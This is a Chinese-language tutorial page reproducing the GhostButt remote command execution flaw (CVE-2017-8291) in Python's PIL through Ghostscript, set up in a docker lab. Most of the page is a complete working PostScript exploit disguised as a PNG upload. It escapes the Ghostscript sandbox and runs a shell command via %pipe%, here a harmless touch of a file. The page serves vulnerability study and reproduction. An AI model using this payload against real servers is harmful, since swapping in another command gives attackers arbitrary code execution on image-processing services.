Python教程

Python PIL远程命令执行漏洞(GhostButt)

本文主要是介绍Python PIL远程命令执行漏洞(GhostButt),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

1.原理

Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。PIL内部根据图片头来判断图片类型,如果发现是一个eps文件,则分发给PIL/EpsImagePlugin.py处理。如果操作系统上安装了GhostScript就会因为它的一个沙盒绕过漏洞,导致任意命令执行。

2.漏洞环境

docker-compose up -d

运行后,访问http://192.168.184.130:8000/

在这里插入图片描述

3.漏洞复现

正常功能是上传一个PNG文件,后端调用PIL加载图片,输出长宽。攻击者可以上传EPS文件后缀修改为PNG进行文件上传,因为后端是根据文件头来判断图片类型,所以无视后缀检查。

# POC.png
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%touch /tmp/aaaaa)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

上传后查看创建的文件
在这里插入图片描述

这篇关于Python PIL远程命令执行漏洞(GhostButt)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
栏目导航